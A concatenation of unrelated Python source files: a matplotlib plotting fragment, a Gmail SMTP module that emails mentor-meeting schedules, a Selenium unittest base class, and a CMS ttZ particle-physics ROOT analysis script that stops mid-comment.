lx, ly = label_position[system][dataset]
ax.text(lx, ly, system_names[system], fontsize=8, color=system_colors[system])
ax.set_ylim(0, 1)
ax.xaxis.set_ticks([ x/100.0 for x in dataset_recalls[dataset]])
ax.xaxis.set_ticklabels([('%s\\%%' % x) for x in dataset_recalls[dataset]])
names = [system_names[n] for n in systems]
title_text = '{\\bf ' + title + '}'
fig.tight_layout()
plt.savefig(output_file)
|
import csv
import smtplib
from email.mime.text import MIMEText
from functions.utilities import variables as vrs
from functions.utilities import utils
from functions.utilities import directories as dr
from utilities import email_templates
from database import db_interface as db
def send_added_msgs(msg_dict, server):
"""
:param msg_dict: dictionary where keys: names and values: lists of Meeting objects
:param server: instance of SMTP server
:return:
"""
for name, meeting_list in msg_dict.items():
# clean_name = utils.process_name(name)
# Group by day:
day_list = [x.day for x in meeting_list]
unique_days = set(day_list)
name_type = ''
first_meeting = meeting_list[0]
if first_meeting.associate == name:
name_type = 'associate'
elif first_meeting.company == name:
name_type = 'company'
for day in unique_days:
daily_meetings = [x for x in meeting_list if x.day == day]
# Get full schedule for the day for that team or associate
full_schedule = db.get_all_daily_schedules(name=name, name_type=name_type, day=day)
if name == 'not_found':
address_name = name
else:
address_name = dr.names_to_proper_names[name]
# Load email template and populate with personalized info
msg = email_templates.added_meeting_msg
added_meeting_list = _bulk_event_formatter(daily_meetings)
msg.replace('[ADDED MEETING LIST]', added_meeting_list)
msg.replace(['[ADDRESS NAME]'], address_name)
msg.replace(['[DAY]'], day)
event_list = _bulk_event_formatter(full_schedule[name])
if not event_list:
msg.replace('[FULL MEETING LIST]', '\n\nNo meetings!')
else:
msg.replace('[FULL MEETING LIST]', ''.join(event_list))
to_addresses = dr.update_email_list[name]
# Make the addresses into a list
if not isinstance(to_addresses, list):
to_addresses = [to_addresses]
# Get the start times for added meetings of a given day
meeting_start_times = [x.start_time for x in daily_meetings]
if len(meeting_start_times) > 1:
start_times = ', '.join(meeting_start_times)
else:
start_times = meeting_start_times[0]
# Send an email to each person
for addr in to_addresses:
message = MIMEText(msg)
message['From'] = 'mentor.madness.bot@gmail.com'
message['To'] = addr
message['Subject'] = 'New mentor meeting at ' + start_times + ' on '+ day
server.send_message(message)
print('Sent added email - ' + address_name + ' for ' + day)
def send_deleted_msgs(mtg_dict, server):
"""
:param mtg_dict: dictionary where keys: names and values: lists of Meeting objects
:param server: instance of SMTP server
:return:
"""
for name, meeting_list in mtg_dict.items():
# Group by day:
day_list = [x.day for x in meeting_list]
unique_days = set(day_list)
# Determine who the name corresponds to
name_type = ''
first_meeting = meeting_list[0]
if first_meeting.associate == name:
name_type = 'associate'
elif first_meeting.company == name:
name_type = 'company'
for day in unique_days:
daily_meetings = [x for x in meeting_list if x.day == day]
# Get full schedule for the day for that team or associate
full_schedule = db.get_all_daily_schedules(name=name, name_type=name_type, day=day)
if name == 'not_found':
address_name = name
else:
address_name = dr.names_to_proper_names[name]
# Get email template
msg = email_templates.deleted_meeting_msg
# Format the meetings and insert them into the email template
deleted_meeting_list = _bulk_event_formatter(daily_meetings)
msg.replace('[DELETED MEETING LIST]', deleted_meeting_list)
msg.replace(['[ADDRESS NAME]'], address_name)
msg.replace(['[DAY]'], day)
# Format the full schedule and insert that as well
event_list = _bulk_event_formatter(full_schedule[name])
if not event_list:
msg.replace('[FULL MEETING LIST]', '\n\nNo meetings!')
else:
msg.replace('[FULL MEETING LIST]', ''.join(event_list))
to_addresses = dr.update_email_list[name]
if not isinstance(to_addresses, list):
to_addresses = [to_addresses]
# Get the start times for added meetings of a given day
meeting_start_times = [x.start_time for x in daily_meetings]
if len(meeting_start_times) > 1:
start_times = ', '.join(meeting_start_times)
else:
start_times = meeting_start_times[0]
for addr in to_addresses:
message = MIMEText(msg)
message['From'] = 'mentor.madness.bot@gmail.com'
message['To'] = addr
message['Subject'] = 'Cancelled mentor meeting at ' + start_times + ' on '+ day
server.send_message(message)
print('Sent deleted email - ' + address_name + ' for ' + day)
def send_update_mail(added_mtg_dict, deleted_mtg_dict):
"""
:param added_mtg_dict: dict where keys: names w/ added meetings and values: lists of Meeting objects
:param deleted_mtg_dict: dict where keys: names w/ deleted meetings and values: lists of Meeting objects
:return:
"""
server = _email_login()
# Send mail
send_added_msgs(added_mtg_dict, server)
send_deleted_msgs(deleted_mtg_dict, server)
# Close connection
server.quit()
def send_daily_mail(mtg_dict):
"""
:param mtg_dict:
:return:
"""
server = _email_login()
for key, events in mtg_dict.items():
msg = email_templates.daily_mail_msg
event_list = _bulk_event_formatter(events)
if not event_list:
msg.replace('[FULL MEETING LIST]', '\n\nNo meetings!')
else:
msg.replace('[FULL MEETING LIST]', ''.join(event_list))
to_addresses = dr.daily_email_list[key]
if isinstance(to_addresses, list):
for addr in to_addresses:
message = MIMEText(msg)
message['From'] = 'mentor.madness.bot@gmail.com'
message['To'] = addr
message['Subject'] = 'Mentor meeting summary for tomorrow'
server.send_message(message)
print('Sent daily email to ' + key)
else:
message = MIMEText(msg)
message['From'] = 'mentor.madness.bot@gmail.com'
message['To'] = to_addresses
message['Subject'] = 'Mentor meeting summary for tomorrow'
server.send_message(message)
print('Sent daily email to ' + key)
server.quit()
def send_weekly_mail(mtg_dict):
"""
:param mtg_dict:
:return:
"""
server = _email_login()
for key, events in mtg_dict.items():
msg = 'Hello ' + dr.names_to_proper_names[key] + ',\n\n' + \
'Here are your scheduled meetings for this week:\n\n'
event_list = _bulk_event_formatter(events)
if not event_list:
msg += 'No meetings!'
else:
msg += ''.join(event_list)
msg += '\n\nThis represents the first draft for the week. Please check the main schedule if this is in error.\n\n' + \
'- Scheduling Bot'
to_addresses = dr.daily_email_list[key]
if isinstance(to_addresses, list):
for addr in to_addresses:
message = MIMEText(msg)
message['From'] = 'mentor.madness.bot@gmail.com'
message['To'] = addr
message['Subject'] = 'Mentor meeting summary for next week'
server.send_message(message)
print('Sent weekly email to ' + key)
else:
message = MIMEText(msg)
message['From'] = 'mentor.madness.bot@gmail.com'
message['To'] = to_addresses
message['Subject'] = 'Mentor meeting summary for next week'
server.send_message(message)
print('Sent weekly email to ' + key)
server.quit()
def make_daily_mentor_schedules(mentor_dict):
"""
Generates
:param mentor_dict:
:return:
"""
for key, events in mentor_dict.items():
day = events[0].get('day')
msg = email_templates.mentor_reminder_msg
msg.replace('[KEY]', key)
msg.replace('[DAY]', day)
event_list = _bulk_event_formatter(events, for_mentors=True)
if not event_list:
full_meeting_list = 'No meetings!'
else:
full_meeting_list = ''.join(event_list)
msg.replace('[FULL MEETING LIST]', full_meeting_list)
# Save message to a .txt file
dirname = day.replace(' ', '_').replace('/', '_')
txt_name = key.replace(' ', '_').strip() + '.txt'
filename = vrs.LOCAL_PATH + '/mentor_schedules/' + dirname + '/' + txt_name
with open(filename, 'w') as file:
file.write(msg)
def make_mentor_packet_schedules(mentor_dict):
"""
:param mentor_dict:
:return:
"""
for key, events in mentor_dict.items():
day = events[0].get('day')
msg = '<h1>' + key + '</h1><br/><br/>' + \
'<h2>Schedule - ' + day + '</h2><br/><br/>'
event_list = _bulk_event_formatter(events, for_mentors=True)
if not event_list:
msg += 'No meetings!'
else:
msg += '<br/><br/>'.join(event_list)
# Save message to a .html file
dirname = day.replace(' ', '_').replace('/', '_')
txt_name = key.replace(' ', '_').strip() + '.html'
filename = vrs.LOCAL_PATH + '/mentor_packet_schedules/' + dirname + '/' + txt_name
with open(filename, 'w') as file:
file.write(msg)
def _email_login():
"""
Helper function to log in to the gmail account for the Mentor
Madness Bot and return an instance of the authenticated server.
:return: an instance of an SMTP server
"""
# Get login credentials from stored file
login_file = vrs.LOCAL_PATH +'mm_bot_gmail_login.txt'
file = open(login_file, 'r')
reader = csv.reader(file)
row = next(reader)
username = row[0]
password = row[1]
file.close()
# Start email server
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(user=username, password=password)
return server
def _bulk_event_formatter(event_list, for_mentors=False):
"""
:param event_list: list of Meeting objects
:param for_mentors: bool specifying if the meeting summary is for a mentor
:return: list of formatted strings, each summarizing a meeting
"""
# First check to see if the event dict list is made up only of headers.
# In this case, there are no actual events, so return an empty list
if not any(ed.get('start_time', False) for ed in event_list):
return []
event_list = []
for ed in event_list:
# Choose either mentor name or team name
if for_mentors:
room_subject = ed.get('company')
if room_subject:
room_subject = dr.names_to_proper_names[room_subject]
else:
room_subject = ed.get('mentor')
if ed.get('start_time') is None:
event_list.append('\n\n' + ed.get('day') + '\n')
else:
msg = '\n\t' + ed.get('start_time') + ' - ' + room_subject + \
'\n\t' + 'Room ' + ed.get('room_num') + ' (' + ed.get('room_name') + ')\n'
event_list.append(msg)
return event_list
|
# __author__ = 'wangyazhou'
# -*-coding:utf-8-*-
from .drivers import Browser
import unittest
import logging
import time
import json
import os
'''
=====================说明======================
功能:自定义unittest框架,编写公用函数setup(),tearDown()
================================================
'''
class MyTest(unittest.TestCase):
"""MyTest类继承unittest,并重写setUp和tearDown方法,供test.py继承
"""
@classmethod
def setUpClass(cls):
"""setUp中,进行测试前的准备工作,目前为设置浏览器实例类型,打开测试网站首页,设置浏览器界面大小
"""
cls.path = os.path.dirname(__file__).split('test_case')[0] + r'data\browser.json'
with open(cls.path) as f:
t = json.loads(f.read().replace("\\", r"\\"))
cls.browser_name = t['browser_name']
cls.base_url = t['base_url']
try:
cls.driver = Browser(cls.browser_name).dr()
# cls.driver.reset()
cls.driver.implicitly_wait(8)
cls.driver.get(cls.base_url)
cls.driver.set_window_size(1024, 768)
except BaseException as e:
print('启动浏览器失败!', e)
logging.error('启动浏览器失败')
@classmethod
def tearDownClass(cls):
"""tearDown中,进行测试后工作,目前为退出浏览器
"""
try:
time.sleep(2)
cls.driver.quit()
logging.info('浏览器退出成功!')
except BaseException as e:
logging.error('浏览器退出失败!' + str(e))
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
''' Analysis script for standard plots
'''
#
# Standard imports and batch mode
#
import ROOT, os
ROOT.gROOT.SetBatch(True)
import itertools
from math import sqrt, cos, sin, pi, acos, cosh
from RootTools.core.standard import *
from TopEFT.Tools.user import plot_directory
from TopEFT.Tools.helpers import deltaPhi, getObjDict, getVarValue, deltaR, deltaR2
from TopEFT.Tools.objectSelection import getFilterCut
from TopEFT.Tools.cutInterpreter import cutInterpreter
from TopEFT.Tools.triggerSelector import triggerSelector
from TopEFT.samples.color import color
# for mt2ll
from TopEFT.Tools.mt2Calculator import mt2Calculator
mt2Calc = mt2Calculator()
#
# Arguments
#
import argparse
argParser = argparse.ArgumentParser(description = "Argument parser")
argParser.add_argument('--logLevel', action='store', default='INFO', nargs='?', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE', 'NOTSET'], help="Log level for logging")
args = argParser.parse_args()
# PU reweighting on the fly
from TopEFT.Tools.puProfileCache import puProfile
from TopEFT.Tools.puReweighting import getReweightingFunction
from TopEFT.samples.helpers import fromHeppySample
#
# Logger
#
import TopEFT.Tools.logger as logger
import RootTools.core.logger as logger_rt
logger = logger.get_logger( args.logLevel, logFile = None)
logger_rt = logger_rt.get_logger(args.logLevel, logFile = None)
#
# Make samples, will be searched for in the postProcessing directory
#
data_directory = "/afs/hephy.at/data/dspitzbart02/cmgTuples/"
postProcessing_directory = "TopEFT_PP_2016_mva_v17/trilep/"
from TopEFT.samples.cmgTuples_Data25ns_80X_07Aug17_postProcessed import *
data_directory = "/afs/hephy.at/data/dspitzbart02/cmgTuples/"
postProcessing_directory = "TopEFT_PP_2016_mva_v18/trilep/"
from TopEFT.samples.cmgTuples_Summer16_mAODv2_postProcessed import *
data_directory = "/afs/hephy.at/data/dspitzbart02/cmgTuples/"
postProcessing_directory = "TopEFT_PP_2016_mva_v19/dilep/"
dirs = {}
dirs['TTZ'] = ['TTZToLLNuNu_ext','TTZToQQ', 'TTZToLLNuNu_m1to10']#, 'TTZToQQ']
dirs['TTZToLLNuNu'] = ['TTZToLLNuNu_m1to10', 'TTZToLLNuNu_ext']
dirs['TTZToQQ'] = ['TTZToQQ']
directories = { key : [ os.path.join( data_directory, postProcessing_directory, dir) for dir in dirs[key]] for key in dirs.keys()}
# Define samples
TTZ = Sample.fromDirectory(name="TTZ", treeName="Events", isData=False, color=color.TTZ, texName="t#bar{t}Z,Z to inv.", directory=directories['TTZ'])
quadlepSelection = cutInterpreter.cutString('quadlep-lepSelQuad-njet1p-btag1p-onZ1-offZ2-min_mll12') # offZ2 in cutinterpreter doesn't do anything
quadlepSelection += "&&lep_pt[nonZ1_l1_index_4l]>40&&lep_pt[nonZ1_l2_index_4l]>20"
dilepSelection = cutInterpreter.cutString('lepSelDY-njet3p-btag1p')
dilepSelection += '&&nlep==2&&nLeptons_tight_4l==2&&(nElectrons_tight_4l==1&&nMuons_tight_4l==1)'
#dilepSelection += '&&nlep==2&&nLeptons_tight_4l==2&&((nElectrons_tight_4l==1&&nMuons_tight_4l==1)||(nElectrons_tight_4l==2&&abs(Z1_mass_4l-91.2)>10)||(nMuons_tight_4l==2&&abs(Z1_mass_4l-91.2)>10))'
dilepSelection += '&&genZ_pt>=0'
#dilepSelection += '&&(abs(genZ_daughter_flavor)==12||abs(genZ_daughter_flavor)==14||abs(genZ_daughter_flavor)==16)'
invisibleSelection = '(abs(genZ_daughter_flavor)==12||abs(genZ_daughter_flavor)==14||abs(genZ_daughter_flavor)==16)'
leptonicSelection = '(abs(genZ_daughter_flavor)==11||abs(genZ_daughter_flavor)==13)'
tauSelection = '(abs(genZ_daughter_flavor)==15)'
hadronicSelection = '(abs(genZ_daughter_flavor)<7)'
#
# Text on the plots
#
def drawObjects( plotData, dataMCScale, lumi_scale ):
tex = ROOT.TLatex()
tex.SetNDC()
tex.SetTextSize(0.04)
tex.SetTextAlign(11) # align right
lines = [
(0.15, 0.95, 'CMS Preliminary' if plotData else 'CMS Simulation'),
(0.45, 0.95, 'L=%3.1f fb{}^{-1} (13 TeV) Scale %3.2f'% ( lumi_scale, dataMCScale ) ) if plotData else (0.45, 0.95, 'L=%3.1f fb{}^{-1} (13 TeV)' % lumi_scale)
]
return [tex.DrawLatex(*l) for l in lines]
#scaling = { i+1:0 for i in range(len(signals)) }
def drawPlots(plots, mode, dataMCScale):
for log in [False, True]:
plot_directory_ = os.path.join(plot_directory, 'analysisPlots', args.plot_directory, mode + ("_log" if log else ""), args.selection)
for plot in plots:
if not max(l[0].GetMaximum() for l in plot.histos): continue # Empty plot
if not args.noData:
if mode == "all": plot.histos[1][0].legendText = "Data"
if mode == "SF": plot.histos[1][0].legendText = "Data (SF)"
extensions_ = ["pdf", "png", "root"] if mode == 'all' else ['png']
plotting.draw(plot,
plot_directory = plot_directory_,
extensions = extensions_,
ratio = {'yRange':(0.1,1.9)} if not args.noData else None,
logX = False, logY = log, sorting = True,
yRange = (0.03, "auto") if log else (0.001, "auto"),
scaling = scaling if args.normalize else {},
legend = [ (0.15,0.9-0.03*sum(map(len, plot.histos)),0.9,0.9), 2],
drawObjects = drawObjects( not args.noData, dataMCScale , lumi_scale ),
copyIndexPHP = True,
)
#
# Read variables and sequences
#
read_variables = ["weight/F",
"jet[pt/F,eta/F,phi/F,btagCSV/F,DFb/F,DFbb/F,id/I]", "njet/I","nJetSelected/I",
"lep[mediumMuonId/I,pt/F,eta/F,phi/F,pdgId/I,miniRelIso/F,relIso03/F,relIso04/F,sip3d/F,lostHits/I,convVeto/I,dxy/F,dz/F,hadronicOverEm/F,dEtaScTrkIn/F,dPhiScTrkIn/F,eInvMinusPInv/F,full5x5_sigmaIetaIeta/F,mvaTTV/F]", "nlep/I",
"met_pt/F", "met_phi/F", "metSig/F", "ht/F", "nBTag/I",
"Z1_l1_index_4l/I", "Z1_l2_index_4l/I", "nonZ1_l1_index_4l/I", "nonZ1_l2_index_4l/I", "Z2_l1_index_4l/I", "Z2_l2_index_4l/I",
"Z1_phi_4l/F","Z1_pt_4l/F", "Z1_mass_4l/F", "Z1_eta_4l/F","Z1_lldPhi_4l/F", "Z1_lldR_4l/F", "Z1_cosThetaStar_4l/F","Higgs_mass/F",
"Z2_phi_4l/F","Z2_pt_4l/F", "Z2_mass_4l/F", "Z2_eta_4l/F", "Z2_cosThetaStar_4l/F",
]
variables = map( TreeVariable.fromString, read_variables )
offZ2 = "&&abs(Z2_mass_4l-91.2)>20"
def getLeptonSelection( mode ):
if mode=="mumumumu": return "nMuons_tight_4l==4&&nElectrons_tight_4l==0" + offZ2
elif mode=="mumumue": return "nMuons_tight_4l==3&&nElectrons_tight_4l==1"
elif mode=="mumuee": return "nMuons_tight_4l==2&&nElectrons_tight_4l==2" + offZ2
elif mode=="mueee": return "nMuons_tight_4l==1&&nElectrons_tight_4l==3"
elif mode=="eeee": return "nMuons_tight_4l==0&&nElectrons_tight_4l==4" + offZ2
elif mode=='all': return "nMuons_tight_4l+nElectrons_tight_4l==4"
modes = ["mumumumu","mumumue","mumuee","mueee","eeee"]
def getMT2ll_fromZ( event ):
l1 = ROOT.TLorentzVector()
l2 = ROOT.TLorentzVector()
l1.SetPtEtaPhiM(event.lep_pt[event.nonZ1_l1_index_4l], event.lep_eta[event.nonZ1_l1_index_4l], event.lep_phi[event.nonZ1_l1_index_4l], 0 )
l2.SetPtEtaPhiM(event.lep_pt[event.nonZ1_l2_index_4l], event.lep_eta[event.nonZ1_l2_index_4l], event.lep_phi[event.nonZ1_l2_index_4l], 0 )
mt2Calc.setLeptons(l1.Pt(), l1.Eta(), l1.Phi(), l2.Pt(), l2.Eta(), l2.Phi())
met = ROOT.TLorentzVector()
met.SetPtEtaPhiM( event.met_pt, 0, event.met_phi, 0)
Z = ROOT.TLorentzVector()
Z.SetPtEtaPhiM( event.Z1_pt_4l, event.Z1_eta_4l, event.Z1_phi_4l, 0)
newMet = met+Z
mt2Calc.setMet(newMet.Pt(), newMet.Phi())
event.dl_mt2ll_Z = mt2Calc.mt2ll()
event.met_pt_Z = newMet.Pt()
def getMT2ll_tight_4l( event ):
l1 = ROOT.TLorentzVector()
l2 = ROOT.TLorentzVector()
l1.SetPtEtaPhiM(event.lep_pt[event.nonZ1_l1_index_4l], event.lep_eta[event.nonZ1_l1_index_4l], event.lep_phi[event.nonZ1_l1_index_4l], 0 )
l2.SetPtEtaPhiM(event.lep_pt[event.nonZ1_l2_index_4l], event.lep_eta[event.nonZ1_l2_index_4l], event.lep_phi[event.nonZ1_l2_index_4l], 0 )
mt2Calc.setLeptons(l1.Pt(), l1.Eta(), l1.Phi(), l2.Pt(), l2.Eta(), l2.Phi())
met = ROOT.TLorentzVector()
met.SetPtEtaPhiM( event.met_pt, 0, event.met_phi, 0)
mt2Calc.setMet(met.Pt(), met.Phi())
event.dl_mt2ll_tight_4l = mt2Calc.mt2ll()
logger.info("Getting a template histogram.")
binning = [0,50,100,150,200,340]
metBinning = [5,0,400]
mt2ll_hist = TTZ.get1DHistoFromDraw('dl_mt2ll', binning, selectionString=dilepSelection, weightString='weight', binningIsExplicit=True, addOverFlowBin='upper')
met_hist = TTZ.get1DHistoFromDraw('met_pt', metBinning, selectionString=dilepSelection, weightString='weight', binningIsExplicit=False, addOverFlowBin='upper')
hists = {}
met_hists = {}
quadlep_samples = [Run2016, rare, TTX, ZZ]
dilep_samples = [TTZ]
tr = triggerSelector(2016)
lumi_scale = 35.9
logger.info("Now working on 4l samples.")
for s in quadlep_samples:
logger.info("Sample: %s", s.name)
hists[s.name] = mt2ll_hist.Clone()
hists[s.name].Reset()
hists[s.name].legendText = s.texName
met_hists[s.name] = met_hist.Clone()
met_hists[s.name].Reset()
met_hists[s.name].legendText = s.texName
# selection for data or MC. Trigger and filters and stuff!
for mode in modes:
logger.info("Working on mode %s", mode)
if s.isData:
s.setSelectionString([getFilterCut(isData=True, year=2016), quadlepSelection, getLeptonSelection(mode)])
else:
s.setSelectionString([getFilterCut(isData=False, year=2016), quadlepSelection, tr.getSelection("MC"), getLeptonSelection(mode)])
reader = s.treeReader( variables = variables )
reader.start()
while reader.run():
r = reader.event
getMT2ll_fromZ(r)
if r.dl_mt2ll_Z > binning[-1]: r.dl_mt2ll_Z = binning[-1]-1
if r.met_pt_Z > metBinning[-1]: r.met_pt_Z = metBinning[-1]-1
weight = r.weight*lumi_scale if not s.isData else r.weight
hists[s.name].Fill(r.dl_mt2ll_Z, weight)
met_hists[s.name].Fill(r.met_pt_Z, weight)
del reader
logger.info("Now working on 2l samples.")
for s in dilep_samples:
logger.info("Sample: %s", s.name)
hists[s.name] = mt2ll_hist.Clone()
hists[s.name].Reset()
hists[s.name].legendText = s.texName
met_hists[s.name] = met_hist.Clone()
met_hists[s.name].Reset()
met_hists[s.name].legendText = s.texName
# selection for data or MC. Trigger and filters and stuff!
s.setSelectionString([getFilterCut(isData=False, year=2016), dilepSelection, invisibleSelection, tr.getSelection("MC")])
reader = s.treeReader( variables = variables )
reader.start()
while reader.run():
r = reader.event
getMT2ll_tight_4l(r)
if r.dl_mt2ll_tight_4l > binning[-1]: r.dl_mt2ll_tight_4l = binning[-1]-1
if r.met_pt > metBinning[-1]: r.met_pt_Z = metBinning[-1]-1
hists[s.name].Fill(r.dl_mt2ll_tight_4l, r.weight*lumi_scale)
met_hists[s.name].Fill(r.met_pt, r.weight*lumi_scale)
del reader
logger.info("Getting scaling...")
data_yield = hists['Run2016'].Integral()
other_yield = 0.
for s in quadlep_samples:
if not s.isData:
y = hists[s.name].Integral()
logger.info("Process %s has yield: %.2f", s, y)
other_yield += y
# scale TTZ
TTZ_scale = (data_yield-other_yield)/hists['TTZ'].Integral()
logger.info("Scale for dilep ttZ sample: %.2f", TTZ_scale)
hists['TTZ'].Scale(TTZ_scale)
met_hists['TTZ'].Scale(TTZ_scale)
########## now just plot I guess
for name in hists.keys():
#hists[name].legendText = name
if not name == 'Run2016':
hists[name].style = styles.fillStyle(getattr(color, name))
met_hists[name].style = styles.fillStyle(getattr(color, name))
else:
hists[name].style = styles.errorStyle(ROOT.kBlack)
met_hists[name].style = styles.errorStyle(ROOT.kBlack)
logger.info("Plotting.")
for log in [True, False]:
postFix = '_log' if log else ''
plots = [[hists['TTZ'], hists['ZZ'], hists['TTX'], hists['rare']], [hists['Run2016']]]
plotting.draw(
Plot.fromHisto("dl_mt2ll"+postFix,
plots,
texX = "M_{T2}(ll) (GeV)"
),
plot_directory = "/afs/hephy.at/user/d/dspitzbart/www/stopsDileptonLegacy/TTZstudies/ttZ_4l/",
logX = False, logY = log, sorting = False,
drawObjects = drawObjects(True, 1.0, lumi_scale),
#scaling = {0:1},
ratio = {'histos':[(1,0)], 'yRange':(0.1,1.9)},
legend = [ (0.55,0.7,0.9,0.9), 1],
copyIndexPHP = True
)
plots = [[met_hists['TTZ'], met_hists['ZZ'], met_hists['TTX'], met_hists['rare']], [met_hists['Run2016']]]
plotting.draw(
Plot.fromHisto("met_pt"+postFix,
plots,
texX = "E_{T}^{miss} (GeV)"
),
plot_directory = "/afs/hephy.at/user/d/dspitzbart/www/stopsDileptonLegacy/TTZstudies/ttZ_4l/",
logX = False, logY = log, sorting = False,
drawObjects = drawObjects(True, 1.0, lumi_scale),
#scaling = {0:1},
ratio = {'histos':[(1,0)], 'yRange':(0.1,1.9)},
legend = [ (0.55,0.7,0.9,0.9), 1],
copyIndexPHP = True
)
##
## Loop over channels
##
#yields = {}
#allPlots = {}
#allModes = ['mumumumu','mumumue','mumuee', 'mueee', 'eeee']
#for index, mode in enumerate(allModes):
# yields[mode] = {}
# logger.info("Working on mode %s", mode)
# if not args.noData:
# data_sample = Run2016 if args.year == 2016 else Run2017
# data_sample.texName = "data"
#
# data_sample.setSelectionString([getFilterCut(isData=True, year=args.year), getLeptonSelection(mode)])
# data_sample.name = "data"
# data_sample.read_variables = ["evt/I","run/I"]
# data_sample.style = styles.errorStyle(ROOT.kBlack)
# lumi_scale = data_sample.lumi/1000
#
# if args.noData: lumi_scale = 35.9 if args.year == 2016 else 41.0
# weight_ = lambda event, sample: event.weight
#
# if args.year == 2016:
# mc = [ TTZtoLLNuNu, TTX, rare, ZZ ]
# else:
# mc = [ TTZtoLLNuNu_17, TTX_17, rare_17, ZZ_17 ]
#
# for sample in mc: sample.style = styles.fillStyle(sample.color)
#
# for sample in mc + signals:
# sample.scale = lumi_scale
# sample.read_variables = ['reweightBTagCSVv2_SF/F', 'reweightBTagDeepCSV_SF/F', 'reweightPU36fb/F', 'reweightTrigger_tight_4l/F', 'reweightLeptonTrackingSF_tight_4l/F', 'nTrueInt/F', 'reweightPU36fb/F', 'reweightLeptonSF_tight_4l/F']#, 'reweightLeptonSF_tight_4l/F']
#
# if args.year == 2016:
# sample.weight = lambda event, sample: event.reweightBTagDeepCSV_SF*event.reweightTrigger_tight_4l*event.reweightLeptonTrackingSF_tight_4l*event.reweightPU36fb*event.reweightLeptonSF_tight_4l #*nTrueInt36fb_puRW(event.nTrueInt)
# else:
# sample.weight = lambda event, sample: event.reweightBTagDeepCSV_SF*event.reweightTrigger_tight_4l*event.reweightPU36fb*event.reweightLeptonSF_tight_4l #*event.reweightLeptonSF_tight_4l #*nTrueInt36fb_puRW(event.nTrueInt)
# tr = triggerSelector(args.year)
# sample.setSelectionString([getFilterCut(isData=False, year=args.year), getLeptonSelection(mode), tr.getSelection("MC")])
#
# if not args.noData:
# stack = Stack(mc, data_sample)
# else:
# stack = Stack(mc)
#
# stack.extend( [ [s] for s in signals ] )
#
# if args.small:
# for sample in stack.samples:
# sample.reduceFiles( to = 1 )
#
# # Use some defaults
# Plot.setDefaults(stack = stack, weight = weight_, selectionString = cutInterpreter.cutString(args.selection), addOverFlowBin='both')
#
# plots = []
#
# plots.append(Plot(
# name = 'yield', texX = 'yield', texY = 'Number of Events',
# attribute = lambda event, sample: 0.5 + index,
# binning=[5, 0, 5],
# ))
#
# plots.append(Plot(
# name = 'nVtxs', texX = 'vertex multiplicity', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "nVert/I" ),
# binning=[50,0,50],
# ))
#
# plots.append(Plot(
# texX = 'E_{T}^{miss} (GeV)', texY = 'Number of Events / 20 GeV',
# attribute = TreeVariable.fromString( "met_pt/F" ),
# binning=[400/20,0,400],
# ))
#
# plots.append(Plot(
# texX = 'H_{T} (GeV)', texY = 'Number of Events / 20 GeV',
# attribute = TreeVariable.fromString( "ht/F" ),
# binning=[800/20,0,800],
# ))
#
# plots.append(Plot(
# texX = '#phi(E_{T}^{miss})', texY = 'Number of Events / 20 GeV',
# attribute = TreeVariable.fromString( "met_phi/F" ),
# binning=[10,-pi,pi],
# ))
#
# plots.append(Plot(
# texX = 'p_{T}(ll) (GeV)', texY = 'Number of Events / 20 GeV',
# attribute = TreeVariable.fromString( "Z1_pt_4l/F" ),
# binning=[20,0,400],
# ))
#
# plots.append(Plot(
# name = 'Z1_pt_coarse', texX = 'p_{T}(ll) (GeV)', texY = 'Number of Events / 50 GeV',
# attribute = TreeVariable.fromString( "Z1_pt_4l/F" ),
# binning=[16,0,800],
# ))
#
# plots.append(Plot(
# name = 'Z1_pt_superCoarse', texX = 'p_{T}(ll) (GeV)', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "Z1_pt_4l/F" ),
# binning=[3,0,600],
# ))
#
# plots.append(Plot(
# name = 'Z1_pt_analysis', texX = 'p_{T}(ll) (GeV)', texY = 'Number of Events / 100 GeV',
# attribute = TreeVariable.fromString( "Z1_pt_4l/F" ),
# binning=[4,0,400],
# ))
#
# plots.append(Plot(
# name = "invM_3l",
# texX = 'M(3l) (GeV)', texY = 'Number of Events',
# attribute = lambda event, sample:event.threelmass,
# binning=[25,0,500],
# ))
#
# plots.append(Plot(
# texX = '#Delta#phi(ll)', texY = 'Number of Events',
# attribute = TreeVariable.fromString( "Z1_lldPhi_4l/F" ),
# binning=[10,0,pi],
# ))
#
# # plots of lepton variables
#
# plots.append(Plot(
# name = "lZ1_pt",
# texX = 'p_{T}(l_{1,Z}) (GeV)', texY = 'Number of Events / 10 GeV',
# attribute = lambda event, sample:event.lep_pt[event.Z1_l1_index_4l],
# binning=[30,0,300],
# ))
#
# plots.append(Plot(
# name = "lZ1_eta",
# texX = 'eta(l_{1,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_eta[event.Z1_l1_index_4l],
# binning=[40,-4.,4.],
# ))
#
# plots.append(Plot(
# name = "lZ1_phi",
# texX = '#phi(l_{1,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_phi[event.Z1_l1_index_4l],
# binning=[40,-3.2,3.2],
# ))
#
# plots.append(Plot(
# name = "lZ1_pdgId",
# texX = 'PDG ID (l_{1,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_pdgId[event.Z1_l1_index_4l],
# binning=[30,-15,15],
# ))
#
# # lepton 2
# plots.append(Plot(
# name = "lZ2_pt",
# texX = 'p_{T}(l_{2,Z}) (GeV)', texY = 'Number of Events / 10 GeV',
# attribute = lambda event, sample:event.lep_pt[event.Z1_l2_index_4l],
# binning=[20,0,200],
# ))
#
#
# plots.append(Plot(
# name = "lZ2_eta",
# texX = 'eta(l_{2,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_eta[event.Z1_l2_index_4l],
# binning=[40,-4.,4.],
# ))
#
# plots.append(Plot(
# name = "lZ2_phi",
# texX = '#phi(l_{2,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_phi[event.Z1_l2_index_4l],
# binning=[40,-3.2,3.2],
# ))
#
# plots.append(Plot(
# name = "lZ2_pdgId",
# texX = 'PDG ID (l_{2,Z})', texY = 'Number of Events',
# attribute = lambda event, sample:event.lep_pdgId[event.Z1_l2_index_4l],
# binning=[30,-15,15],
# ))
#
# # lepton 3
# plots.append(Plot(
# name = 'lnonZ1_pt',
